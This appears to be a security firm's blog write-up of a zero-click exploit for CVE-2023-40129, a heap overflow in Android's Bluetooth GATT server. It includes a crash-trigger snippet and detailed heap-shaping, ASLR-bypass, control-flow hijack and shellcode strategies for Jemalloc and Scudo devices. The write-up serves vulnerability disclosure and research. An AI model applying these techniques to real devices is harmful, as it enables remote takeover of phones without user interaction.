Paint it blue: Attacking the bluetooth stack

Written by Mehdi Talbi, Etienne Helluy-Lafont - 27/10/2025 - in Exploit - Download

Bluetooth has always been an attractive target to attackers since it is present almost everywhere (TV, automotive charger, connected fridge, etc.). This is especially true on mobile devices, as it runs as a privileged process with a potential access to microphone, address book, etc.

In September and October 2023, Android published security bulletins addressing critical vulnerabilities in their Bluetooth stack (Fluoride), which could lead to remote code execution. CVE-2023-40129 is an integer underflow in the GATT protocol, which is accessible without authentication or user interaction. It was very challenging to exploit as it was causing a 64 KB heap overflow, acting like a tsunami devastating everything in its path, leading the Bluetooth process to an almost certain death.

In this blogpost, we detail how we exploited this vulnerability on both Android native allocators: Scudo and Jemalloc.

Looking to improve your skills? Discover our trainings sessions! Learn more.

The Bluetooth Stack

The diagram above illustrates the Bluetooth stack. It is divided in two main parts: the Controller stack resides in the Bluetooth chip, while the Host stack is implemented by the operating system. The Host Controller Interface (HCI) enables communication between the two components. The controller mostly manages the physical and logical transports. Our exploit relies on ACL, the asynchronous transport that carries data frames. On Android, the Host stack - called Fluoride - runs as a userland daemon. After the ACL link is established, L2CAP (Logical Link Control and Adaptation Protocol) connections can be initiated to access various Bluetooth services (BNEP, HID, AVCTP, etc.), which provide well-known features such as networking sharing, video streaming, etc. Each service is identified by a unique Protocol Service Multiplexer (PSM):

Service	PSM
SDP (Service Discovery Protocol)	0x0001
RFCOMM (Radio Frequency Communication)	0x0003
BNEP (Bluetooth Network Encapsulation Protocol)	0x000F
HID (Human Interface Device)	0x0011 (Control), 0x0013 (Interrupt)
AVCTP (Audio/Video Control Transport Protocol)	0x0017 (Control), 0x001B (Browsing)
AVDTP (Audio/Video Data Transport Protocol)	0x0019
GATT (Generic Attribute Protocol)	0x001F
GAP (Generic Access Profile)	0x01001, 0x1003, 0x1005, 0x1007

The code related to each service is located under the system/stack/ directory. Each service is registered via the following API:

uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
                        bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
                        uint16_t my_mtu, uint16_t required_remote_mtu,
                        uint16_t sec_level)

The sec_level parameter defines the security level for accessing the service. Most services require the connection to be authenticated and encrypted.

Very few services can be accessed without authentication - namely SDP, RFCOMM, and GATT. But even when a connection starts unauthenticated, certain operations (like writing GATT attributes) may later require it - further reducing the attack surface.

The BlueBlue framework

Building upon the L2CAP testing framework of the BlueBorne project, we developed our own framework named BlueBlue. It conveniently uses Scapy to build and parse HCI frames. The framework allows to establish an ACL link with a peer device and to open L2CAP connections.

It also supports multiple features of the Bluetooth specification such as LCAP fragmentation and the ERTM transmission mode. It implements all the features of the Host stack that we are using, giving us a plenty of freedom to explore new ideas.

With just a few lines of codes, we can establish an ACL connection, connect to a L2CAP service, send a command and receive the reply:

acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode = 'justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

The Bug

CVE-2023-40129 is a vulnerability present in the GATT server. The GATT protocol is used to expose simple key-value attributes. Keys are 16-bits handles, while values are simple raw data. The opcode GATT_REQ_READ_MULTI_VAR allows to read multiple attributes at once.

The request is made of the opcode GATT_REQ_READ_MULTI_VAR followed by the list of GATT handles:

The response is made of the opcode GATT_RSP_READ_MULTI_VAR followed by the length and the value of each requested attributes:

The request is handled in the gatt_process_read_multi_req() function, which is responsible for retrieving the values of the requested attributes:

for (ll = 0; ll < multi_req->num_handles; ll++) {
  tGATTS_RSP* p_msg = (tGATTS_RSP*)osi_calloc(sizeof(tGATTS_RSP));
  handle = multi_req->handles[ll];
  auto it = gatt_sr_find_i_rcb_by_handle(handle);

  p_msg->attr_value.handle = handle;
  err = gatts_read_attr_value_by_handle(
    tcb, cid, it->p_db, op_code, handle, 0, p_msg->attr_value.value,
    &p_msg->attr_value.len, GATT_MAX_ATTR_LEN, sec_flag, key_size,
    trans_id);

  if (err == GATT_SUCCESS) {
    gatt_sr_process_app_rsp(tcb, it->gatt_if, trans_id, op_code,
                            GATT_SUCCESS, p_msg, sr_cmd_p);
  }
  /* either not using or done using the buffer, release it now */
  osi_free(p_msg);
}

The function gatt_sr_process_app_rsp() is called for each attribute. It forwards the retrieved attribute value (encapsulated in p_msg variable) to the function process_read_multi_rsp() that copies it in a newly allocated structure and then pushes it in a queue:

static bool process_read_multi_rsp(tGATT_SR_CMD* p_cmd, tGATT_STATUS status,
                                   tGATTS_RSP* p_msg, uint16_t mtu)
{

  if (p_cmd->multi_rsp_q == NULL)
    p_cmd->multi_rsp_q = fixed_queue_new(SIZE_MAX);

  /* Enqueue the response */
  BT_HDR* p_buf = (BT_HDR*)osi_malloc(sizeof(tGATTS_RSP));
  memcpy((void*)p_buf, (const void*)p_msg, sizeof(tGATTS_RSP));
  fixed_queue_enqueue(p_cmd->multi_rsp_q, p_buf);

  p_cmd->status = status;
  if (status == GATT_SUCCESS) {
    /* Wait till we get all the responses */
    if (fixed_queue_length(p_cmd->multi_rsp_q) ==
        p_cmd->multi_req.num_handles) {
      build_read_multi_rsp(p_cmd, mtu);
      return (true);
    }
  } else /* any handle read exception occurs, return error */
  {
    return (true);
  }

  /* If here, still waiting */
  return (false);
}

The vulnerability is present in the function build_read_multi_rsp(), which is responsible for building the response message:

static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
  uint16_t ii, total_len, len;
  uint8_t* p;
  bool is_overflow = false;

  len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;                        // [0]
  BT_HDR* p_buf = (BT_HDR*)osi_calloc(len);
  p_buf->offset = L2CAP_MIN_OFFSET;
  p = (uint8_t*)(p_buf + 1) + p_buf->offset;

  /* First byte in the response is the opcode */
  if (p_cmd->multi_req.variable_len)
    *p++ = GATT_RSP_READ_MULTI_VAR;
  else
    *p++ = GATT_RSP_READ_MULTI;

  p_buf->len = 1;

  /* Now walk through the buffers putting the data into the response in order
   */
  list_t* list = NULL;
  const list_node_t* node = NULL;
  if (!fixed_queue_is_empty(p_cmd->multi_rsp_q))
    list = fixed_queue_get_list(p_cmd->multi_rsp_q);
  for (ii = 0; ii < p_cmd->multi_req.num_handles; ii++) {
    tGATTS_RSP* p_rsp = NULL;

    if (list != NULL) {
      if (ii == 0)
        node = list_begin(list);
      else
        node = list_next(node);
      if (node != list_end(list)) p_rsp = (tGATTS_RSP*)list_node(node); // [1]
    }

    if (p_rsp != NULL) {
      total_len = (p_buf->len + p_rsp->attr_value.len);                 // [2.1]
      if (p_cmd->multi_req.variable_len) {
        total_len += 2;                                                 // [2.2]
      }

      if (total_len > mtu) {
        /* just send the partial response for the overflow case */
        len = p_rsp->attr_value.len - (total_len - mtu);                // [3]
        is_overflow = true;
        VLOG(1) << StringPrintf(
            "multi read overflow available len=%d val_len=%d", len,
            p_rsp->attr_value.len);
      } else {
        len = p_rsp->attr_value.len;
      }

      if (p_cmd->multi_req.variable_len) {
        UINT16_TO_STREAM(p, len);
        p_buf->len += 2;
      }

      if (p_rsp->attr_value.handle == p_cmd->multi_req.handles[ii]) {
        memcpy(p, p_rsp->attr_value.value, len);                        // [4]
        if (!is_overflow) p += len;
        p_buf->len += len;
      } else {
        p_cmd->status = GATT_NOT_FOUND;
        break;
      }

      if (is_overflow) break;

    } else {
      // [...]
    }
  } /* loop through all handles*/
  // [...]
}

At the top of the function [0] we can see an allocation of the structure (p_buf) that holds the response buffer. The size of the allocated buffer depends on the MTU, which can be configured while opening the L2CAP channel.

The next portion of code iterates over the list of GATT attributes [1] and checks whether they fit in the reply message. That is, for each attribute, the function computes the expected total length of the message ([2.1] and [2.2]) and checks whether it exceeds the MTU. If there is not enough room to store the attribute, the maximum size of the data that can be copied into the buffer is computed as shown in [3]. However, the computation of len is flawed since it does not take into account the addition in [2.2]. This integer underflow leads to heap-based overflow in [4] (as ironically predicted by the statement is_overflow = true).

The following snippet of code triggers the vulnerability. It connects to GATT channel and configures a MTU of 55. Then, it requests 4 times the attribute 9 (16 bytes):

acl = ACLConnection(interface, bdaddr)

gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)

pkt = b'\x20'   # GATT_REQ_READ_MULTI_VAR OPCODE 
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr

gatt.send(pkt)

The overflow occurs while trying to insert the last attribute. More precisely, at [3], p_buf->len has a value of 55 (1+ 3*(16+2)) and total_len is 73. Therefore len will underflow to -2 (0xfffe) causing an overflow of about 64KB in the response buffer.

Recently, at OffensiveCon 2025, the Android Red Team at Google behind the discovery of the bug presented a PoC exploit targeting a sibling vulnerability (CVE-2023-35673) on Pixel devices. However their exploit assumes that the ASLR is disabled and that the attacker is already paired with the target device. In the next sections, we detail our exploitation strategy to exploit Fluoride without relying on those assumptions.

Just Works, Still Works

In 2017, the BlueBorne whitepaper disclosed several critical Bluetooth vulnerabilities affecting both BlueZ (Linux stack) and Fluoride (Android Stack). The paper describes an "obscure" authentication method of the Bluetooth specification: Just Works. The Just Works authentication mode allows for temporary pairing without user interaction. It is used when performing Secure Simple Pairing (SSP) with devices that have no keyboard or display. In this scenario, authentication occurs without PIN validation.

We implemented the Just Works authentication mode in the BlueBlue framework and confirmed that it is still working on Android 13.

Just Works authentication comes with some limitations. First, Fluoride treats the connection as vulnerable to MITM attacks, which prevents access to certain features like reading or writing protected GATT attributes. Second, using Just Works breaks any existing pairing with a device that shares the same BDADDR. Despite its limitations, this authentication mode still lets us establish an L2CAP connection to various Bluetooth services such as GAP, BNEP, and AVCTP. Even though the vulnerability does not require prior authentication to be triggered, the way we exploit it requires connecting to multiple L2CAP channels. That is where the Just Works mode comes into play.

Exploitation Primitives

Persistent Data Allocation

The exploitation of this bug requires a fine-grained shaping strategy in order to prevent the Bluetooth daemon from crashing due to a corrupted heap state.

We audited the Fluoride source code and identified features that can be abused to force controlled-size allocations with controlled data and make those allocations persistent. For instance, while configuring an L2CAP channel, if the peer device does not recognize a configuration option, it will send an exact copy (CONFIG REJ message) of the rejected options. A configuration option is made of a type (1-byte field), a length (1-byte field) and the actual value of an arbitrary size which content is fully controlled. The allocation of the response holding the rejected options is made in the following function:

void l2cu_send_peer_config_rej(tL2C_CCB* p_ccb, uint8_t* p_data,
                               uint16_t data_len, uint16_t rej_len) {
    uint16_t len, cfg_len, buf_space, len1;
    uint8_t *p, *p_hci_len, *p_data_end;
    uint8_t cfg_code;

    /* ... */

    len = BT_HDR_SIZE + HCI_DATA_PREAMBLE_SIZE + L2CAP_PKT_OVERHEAD +
          L2CAP_CMD_OVERHEAD + L2CAP_CONFIG_RSP_LEN;

    BT_HDR* p_buf = (BT_HDR*)osi_malloc(len + rej_len);

    /* ... */
}

The allocation is freed as soon as it is sent back to the peer initiating the connection. However, we can make it persistent thanks to congestion.

Congestion

The Bluetooth specification provides a Flow Control feature on the ACL layer. If its ACL RX buffer is full, the Bluetooth controller can clear the FLOW bit of the header of the ACL packets that it sends to prevent the peer from sending more packets while the RX buffer gets processed. This functionality is normally not exposed to the host, but we might manipulate it by modifying a Controller's firmware. Luckily for us, Cypress controllers even feature a proprietary HCI command to toggle it, so it was actually quite simple to simulate an ACL congestion. Within this state, a peer (declared as congested) can still send packets to the peer device but can not receive the replies. The remote device will process these packets, but will be unable to respond. The Fluoride stack gracefully handles congestion. So if we send invalid configuration requests while our controller declares an ACL congestion, Fluoride will not send back the replies, but rather keep them in a queue until the congestion stops.

It should be noted that congestion is limited by a quota. Once the quota is reached, additional messages are dropped instead of being enqueued. However, L2CAP signalling channels are not subject to this limitation which means that we can allocate a virtually unlimited number of CONFIG REJ response messages. We can free all those allocations by closing the related ACL connection.

It is also worth noting that congestion is delayed at the Fluoride stack and the first batch of responses will be freed as soon as they are sent to the controller. The following function checks if a packet can be sent to the controller:

void l2c_link_check_send_pkts(tL2C_LCB* p_lcb, uint16_t local_cid,
                              BT_HDR* p_buf) {
    /* ... */
    while(((l2cb.controller_xmit_window != 0 &&
        (p_lcb->transport == BT_TRANSPORT_BR_EDR)) ||
        (l2cb.controller_le_xmit_window != 0 &&
        (p_lcb->transport == BT_TRANSPORT_LE))) &&
        (p_lcb->sent_not_acked < p_lcb->link_xmit_quota)) {
            p_buf = l2cu_get_next_buffer_to_send(p_lcb);
            if (p_buf == NULL) {
                LOG_DEBUG("No next buffer, skipping");
                break;
            }
            LOG_DEBUG("Sending to lower layer");
            l2c_link_send_to_lower(p_lcb, p_buf);
        }
    }
    /* ... */
}

The check is based on controller_xmit_window variable, which is decremented whenever a packet is transmitted to the underlying controller in the function l2c_link_send_to_lower_br_edr(). Its value is incremented in l2c_packets_completed by the number of acknowledged packets.

ERTM Transmission Mode

ERTM is an additional transport layer, which is built on top of L2CAP and adds some reliability on it: Sequence numbering, acknowledgement, and retransmission. We can abuse this mode in two different ways to force persistent allocations:

Send an L2CAP fragment with an unexpected sequence number of, e.g. seq_tx = 1. As long as the message with sequence number seq_tx = 0 has not been sent, the remote peer will retain all subsequent messages in memory. This behavior is useful as it allows us to allocate messages with controlled size and controlled data.
Force Fluoride to send an ERTM fragment, but intentionally not acknowledge it. The fragment will stay in memory, and we can request for its retransmission anytime as long as we do not acknowledge it.

Each of these two techniques allows the allocation of up to 10 persistent messages per L2CAP connection (this is why we could not rely on ERTM for spraying). Only a limited number of L2CAP channels such as GAP and AVCTP support ERTM mode and all of them require authentication with the peer device.

Relative Read Primitive

The BT_HDR stucture is an interesting target. It is heavily used in the Bluetooh codebase to represent various data such as L2CAP messages and ERTM fragments:

    typedef struct {
      uint16_t event;
      uint16_t len;
      uint16_t offset;
      uint16_t layer_specific;
      uint8_t data[];
    } BT_HDR;

The BT_HDR structure has a variable length. The len field represents the length of the data buffer. It also includes an offset field, which indicates the position of the start of the data within the data field. To build a relative read primitive in the heap, we can rewrite the len field of an ERTM fragment pending in the sending queue and enlarge its size in order to leak heap contents of the com.android.bluetooth process.

The AVCTP browsing channel is a good candidate to build the reading primitive. It uses ERTM and we can force it to transmit a reply of controlled size. The request GET_FOLDER_ITEMS lets us request the metadata of a music playlist (e.g. artist, song name, album name). By sending a GET_FOLDER_ITEMS request with carefully selected attributes, we can make the allocation of the reply fall within the same bin class as the vulnerable buffer. If we alter the BT_HDR structure related to the GET_FOLDER_ITEMS response, we can get a leak by requesting a retransmission of the altered message.

Relative Write Primitive

ERTM supports fragmentation. Messages are reassembled in the do_sar_reassembly(). Upon receiving the first fragment, the function allocates a BT_HDR structure using the size specified in the initial fragment:

if (sar_type == L2CAP_FCR_START_SDU) {
  /* Get the SDU length */
  STREAM_TO_UINT16(p_fcrb->rx_sdu_len, p);
  p_buf->offset += 2;
  p_buf->len -= 2;

  if (p_fcrb->rx_sdu_len > p_ccb->max_rx_mtu) {
    L2CAP_TRACE_WARNING("SAR - SDU len: %u  larger than MTU: %u",
                        p_fcrb->rx_sdu_len, p_ccb->max_rx_mtu);
    packet_ok = false;
  } else {
    p_fcrb->p_rx_sdu = (BT_HDR*)osi_malloc(
        BT_HDR_SIZE + OBX_BUF_MIN_OFFSET + p_fcrb->rx_sdu_len);
    p_fcrb->p_rx_sdu->offset = OBX_BUF_MIN_OFFSET;
    p_fcrb->p_rx_sdu->len = 0;
  }
}

Subsequent fragments are copied using len and offset fields of BT_HDR structure:

memcpy(((uint8_t*)(p_fcrb->p_rx_sdu + 1)) + p_fcrb->p_rx_sdu->offset +
       p_fcrb->p_rx_sdu->len, p, p_buf->len);

p_fcrb->p_rx_sdu->len += p_buf->len;

So by corrupting the offset field, then sending a second fragment with some data, we obtain a relative write primitive

ASLR bypass & PC Control

The Fluoride stack uses the callback object from libchrome to handle various events. This object is interesting to build exploitation primitives since it has a function pointer that is called when the callback fires, and also some of the arguments passed to it. Therefore, leaking this object would reveal the libbluetooth base address, and rewriting it would give us control over the flow of execution.

The SDP Discovery Callback is of particular interest since we control its allocation and we can trigger the callback at any time:

The callback object is allocated in the SdpLookup() function while opening an AVRCP channel:

bool ConnectionHandler::SdpLookup(const RawAddress& bdaddr, SdpCallback cb,
                                  bool retry) {

/* ... */

return avrc_->FindService(UUID_SERVCLASS_AV_REMOTE_CONTROL, bdaddr,
                            &db_params,
                            base::Bind(&ConnectionHandler::SdpCb,
                                       weak_ptr_factory_.GetWeakPtr(), bdaddr,
                                       cb, disc_db, retry)) == AVRC_SUCCESS;
}

The Bind method is reponsible for allocating the callback object (0x60 bytes). The callback structure is filled with the SdbCp function pointer along with its parameters:

void ConnectionHandler::SdpCb(RawAddress bdaddr, SdpCallback cb,
                              tSDP_DISCOVERY_DB* disc_db, bool retry,
                              uint16_t status)

The callback is called in the function avrc_sdp_cback():

/******************************************************************************
 *
 * Function         avrc_sdp_cback
 *
 * Description      This is the SDP callback function used by A2DP_FindService.
 *                  This function will be executed by SDP when the service
 *                  search is completed.  If the search is successful, it
 *                  finds the first record in the database that matches the
 *                  UUID of the search.  Then retrieves various parameters
 *                  from the record.  When it is finished it calls the
 *                  application callback function.
 *
 * Returns          Nothing.
 *
 *****************************************************************************/
static void avrc_sdp_cback(tSDP_STATUS status) {
    AVRC_TRACE_API("%s status: %d", __func__, status);

    /* reset service_uuid, so can start another find service */
    avrc_cb.service_uuid = 0;

    /* return info from sdp record in app callback function */
    avrc_cb.find_cback.Run(status);

    return;
}

Overwriting the callback object allows triggering an arbitrary function call with fully controlled arguments. We can trigger the callback by disconnecting from the SDP channel that is established by the remote device while connecting to the AVRCP browsing channel.

Code execution on Jemalloc devices

Exploitation scenario

In order to get code execution on devices running with Jemalloc devices, we adopted the following strategy:

Shape the heap in order to overlap two BT_HDR objects. The first refers to an ERTM message pending in the transmission queue (reader), while the second corresponds to an ERTM fragmented pending in the reception queue (writer).
Trigger overflow and corrupt both reader and writer objects.
Allocate callback object (executor).
Request the retransmission of the altered packet.
Retrieve the content of the callback object.
Rewrite the content of the callback object using the relative write primitive.
Trigger the callback.

Heap shaping

The first step is to shape the heap in order to overlap the reader and writer objects with controlled data. We rely on the features depicted in the previous section such as congestion and ERTM mode transmission. More precisely, we adopted the following strategy in order to control the source of the overflow as well as to arrange the objects in the destination bin.

Enable ACL congestion.
Spray multiple CONFIG REJ messages.
Interleave ERTM messages allocations during the spray by starting the sequence with seq_tx > 0. ERTM allocations are used to create "holes" in the heap.
Disable ACL congestion. CONFIG REJ allocations are freed.
Free the ERTM allocations by closing for instance the connection. ERTM allocations are reused by the GATT-related objects during the overflow.

The following figure illustrates the heap state to control the source of the overflow. First, we spray a dozen of CONFIG REJ messages in order to enforce the congestion at the Bluetooth stack level. Then, we alternate allocations of ERTM messages and CONFIG REJ messages so that every ERTM message is followed by controlled data. Once freed, the ERTM allocations will be reused by GATT objects (t_GATTS_RSP) holding attributes values that will be copied in the vulnerable object.

Now that we have the desired heap state to control the source of the overflow, let us see how we can arrange the objects (reader, writer and executor) in the same bin as the vulnerable object. For reference, the size of the vulnerable object depends on the MTU size and is computed as follows:

len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu; // 8 + 13 + MTU

We decided to target the same bin used in the allocation of the callback object (executor). By applying the same strategy used to shape the source, we obtained the desired heap state. In the figure shown below, the executor object is allocated after the overflow.

Leaking the ASLR

By corrupting the len field of the reader object, we can leak up to 64 KB of data that includes the content of the executor objects. It holds multiple function pointers that can be used to infer the base address of the libbluetooth library. By analyzing the leaked data, we noted that in some cases the object art::Thread is present in it. It contains several function pointers in the libart, libm and libc libraries, which are mapped at consecutive addresses. Since this object is rarely present in the leak, we decided not to use it in the exploit.

Code execution

Code execution is obtained by rewriting the SDP Discovery Callback object. We can achieve code execution by modifying either the Run or SdpCb function pointers. The Run() function’s sole purpose is to prepare and dispatch the call to the actual callback SdpCb. However, neither of these pointers is convenient, as we do not have fine-grained control over the arguments.

In order to fully control the arguments, we decided to overwrite the Run function pointer in order to call the following function:

__int64 __fastcall sub_5e023c(__int64 callback)
{
  __int64 v1;
  char *v2;
  __int64 *v3;

  v1 = *(_QWORD *)(callback + 0x28);
  v2 = *(char **)(callback + 0x20);
  v3 = (__int64 *)(*(_QWORD *)(callback + 0x30) + (v1 >> 1));
  if ( (v1 & 1) != 0 )
    v2 = *(char **)&v2[*v3];
  return ((__int64 (__fastcall *)(__int64 *, _QWORD, _QWORD, _QWORD, _QWORD))v2)(
           v3,
           *(_QWORD *)(callback + 0x38),
           *(_QWORD *)(callback + 0x40),
           *(unsigned __int8 *)(callback + 0x48),
           *(unsigned int *)(callback + 0x4C));
}

This function (gadget function) allows us to call an arbitrary function while controlling 5 arguments, the first three of which are QWORDs. Both the target function and its arguments are extracted from the object passed as a parameter to gadget.

Now that we control the parameters, let us see how we can call multiple functions.

The list_clear function takes a list_t structure as input and calls the function list_free_node() for each node of the list:

void list_clear(list_t* list) {
    CHECK(list != NULL);
    for (list_node_t* node = list->head; node;)
        node = list_free_node_(list, node);
    list->head = NULL;
    list->tail = NULL;
    list->length = 0;
}

static list_node_t* list_free_node_(list_t* list, list_node_t* node) {
    CHECK(list != NULL);
    CHECK(node != NULL);

    list_node_t* next = node->next;

    if (list->free_cb) list->free_cb(node->data);
    list->allocator->free(node);
    --list->length;

    return next;
}

By injecting a fake list structure with multiple nodes, we can call as many functions as we want. Since we only needed to call two functions, we used a simpler approach: doing the first call through list->free_cb() and the second one through list->allocator->free(). These calls are sufficient to invoke mprotect() - making the page of our shellcode executable - followed by a jump to the shellcode.

The only missing piece of the puzzle is to put arbitrary data at a known address: the shellcode and all the structures (fake list and node objects) needed to execute it.

The callback object gives us a pointer to a 0x1010 bytes heap buffer. By spraying objects (with controlled data) of the same size right after the allocation of the callback object, there is a high probability that they will be placed contiguously in memory. This lets us infer an address where controlled data resides.

The following figure illustrates how to divert the execution control flow in order to execute our shellcode and is summed up hereafter:

Code execution is achieved by rewriting the callback object in order to call the gadget() function.
The gadget function calls the list_clear() function with a fake list object (yellow).
The instruction list->free_cb(node->data) calls again the gadget function in order to prepare the call to mprotect() (pink).
The instruction list->allocator->free(node) calls the shellcode through a call to the gadget function with a fake node object (green) as parameter.

Code execution on Scudo devices

Notes on Scudo allocator

Scudo is a memory allocator designed with a focus on efficiency and security hardening. The following section focuses on the primary allocator that serves small allocations (< 0x10000 bytes).

Scudo organizes memory into regions, each dedicated to allocations of a specific size class (class id). Within these regions, memory is divided into blocks. A block is made of 16 bytes of metadata followed by a chunk - actual memory units returned to the program when calling malloc().

When a thread requests memory, the allocator first checks the thread-local cache for available chunks of the appropriate size class. If a chunk is found, it is returned immediately. If the cache is empty, Scudo attempts to pull a TransferBatch - a group of preallocated chunks - from the global freelist in order to populate the cache. If no batch is available, Scudo allocates memory from a region dedicated to the size class, splits it into individual chunks, randomizes their order to mitigate exploitation, and groups them into one or more TransferBatches. One of these batches is returned to the requesting thread, while the others are stored in the global cache for future use.

For further information about the Scudo allocator, we recommend reading a previous blogpost by Kevin Denis.

Scudo has security mitigations that makes it difficult to reproduce the same attack scenario:

A memory chunk is prefixed by a checksum, which is verified when the chunk is freed. That is, if we corrupt a block's metadata then free it, the program aborts.
Memory blocks are shuffled. In this context, it is difficult to setup the relative write primitive, which assumes that the callback object is reachable from a fixed offset.

To overcome the first issue, one approach is to shape the heap layout to overlap either freed chunks or persistent allocations.

Regarding the shuffling mechanism it is applied per batch of memory blocks rather than once for the entire region. The number of randomized blocks per batch depends on the class size. For memory blocks smaller than 0x350 bytes (size class id from 1 to 15), this value is equal to 52 (4 * 13) which is the product of the number of TransferBatches per the number of memory blocks inside each TransferBatch. Therefore, by inserting N = 52 intermediate allocations between the vulnerable object and the target object, it is possible to position the target within overflow range, making it reachable for corruption:

Exploitation scenario

Since we can not setup a relative write primitive, we will trigger the overflow twice!

The first overflow targets a reader object in order to get the base address of the libbluetooth library.
The second overflow targets an executor object (callback) in order to trigger code execution.

And hope to survive to 64KB of damaged heap data.

Heap shaping

We adopt a slightly different heap shaping strategy in order to control the source of the overflow. As usual, we rely on congestion to spray around hundred of CONFIG REJ messages and use ERTM transmission to create "holes" in the heap.

The diagram below illustrates the source data before and after the overflow. We reserve space for various GATT attributes using ERTM messages. It is important to note that ERTM messages are freed in the order they were allocated. The first ERTM message allocated is the one that will be reclaimed by the vulnerable GATT allocation (shown in green). We separate the allocation of this specific ERTM message so that it is followed by several CONFIG REJ responses containing controlled data.

Memory leak

Unfortunately, attempts to leak the contents of the callback used in the previous exploit were unsuccessful. However, a second callback object was consistently observed in the leaked data. This object is allocated by the ActivityAttribution::Capture() function, which is responsible for logging HCI packets. This object holds several function pointers, allowing us to deduce the base address of the process as well as the location of the allocation that will later host our payload.

Code Execution

Code execution is achieved by triggering the vulnerability a second time to corrupt the SDP Discovery Callback used in the Jemalloc exploit. However, due to memory chunk shuffling, it is hard to reliably rewrite all the fields of the callback object (we can only ensure that the overflowing data will be aligned on a 16-bytes boundary).

One solution is to corrupt the Run function pointer with the address of the following gadget:

LDR  X0, [X0]
MOV  W8, W1
MOV  W1, W2
MOV  W2, W8
LDR  X3, [X0,#8]
BR   X3

Exploitation via this pivot gadget only requires corrupting two specific fields of the callback object to to divert the execution flow as illustrated below:

Post Exploitation

The shellcode installs a command handler over Bluetooth, which provides useful features to interact with the target such as running shell commands or uploading a file on the device. More precisely, the shellcode starts by patching the function l2c_rcv_acl_data() to redirect it to our command handler. This function is called whenever a message is received from the controller.

The shellcode also registers a signal handler to catch SIGSEGV signals, preventing the com.android.bluetooth process from restarting if some thread crashes as a result of the instability induced by the 64KB overflow.

Conclusion

CVE-2023-40129 is a critical vulnerability in the Bluetooth stack, which requires neither user interaction nor prior authentication. We managed to successfully exploit it to achieve remote code execution on Android devices running with Jemalloc (Xiaomi 12T) and Scudo (Samsung A54).

The exploits are not perfectly reliable and often lead the Bluetooth process to a crash. However, the Bluetooth daemon silently reboots, so we can retry the exploit again and again. We conducted some basic testing and found that, on average, the Estimated Time of Shell (ETS) is around 2 minutes on Jemalloc devices, and up to 5 minutes on Scudo devices.

The Gabeldorsche stack (GD)

The Gabeldorsche stack was introduced in Android 12 and became the default Bluetooth stack in Android 13. It represents a major architectural shift, with a progressive rewrite of the Bluetooth stack in Rust. However, as of late 2023, only the low-level layers had been rewritten, leaving higher layers unchanged. As a result, the vulnerability remained exploitable even when GD was enabled.

References

BlueBorne. Ben Seri, Gregory Vishnepolsky (Armis Labs)

Behind the Shield: Unmasking Scudo's Defenses. Kevin Denis (Synacktiv)

0-click RCE on the IVI component: Pwn2Own Automotive Edition. Mikhail Evdokimov (PCAutomotive) - Hexacon'24

Fighting Cavities: Securing Android Bluetooth by Red Teaming. Jeong Wook Oh, Rishika Hooda and Xuan Xing (Google) - OffensiveCon'25

Paint it blue: Attacking the bluetooth stack

The Bluetooth Stack

The BlueBlue framework

The Bug

Just Works, Still Works

Exploitation Primitives

Persistent Data Allocation

Congestion

ERTM Transmission Mode

Relative Read Primitive

Relative Write Primitive

ASLR bypass & PC Control

Code execution on Jemalloc devices

Exploitation scenario

Heap shaping

Leaking the ASLR

Code execution

Code execution on Scudo devices

Notes on Scudo allocator

Exploitation scenario

Heap shaping

Memory leak

Code Execution

Post Exploitation

Conclusion

The Gabeldorsche stack (GD)

References

Other publications

Site Unseen: Enumerating and Attacking Active Directory Sites

Creating a "Two-Face" Rust binary on Linux

Paint it blue: Attacking the bluetooth stack

Contact us

PARIS

TOULOUSE

LYON

RENNES

LILLE

BORDEAUX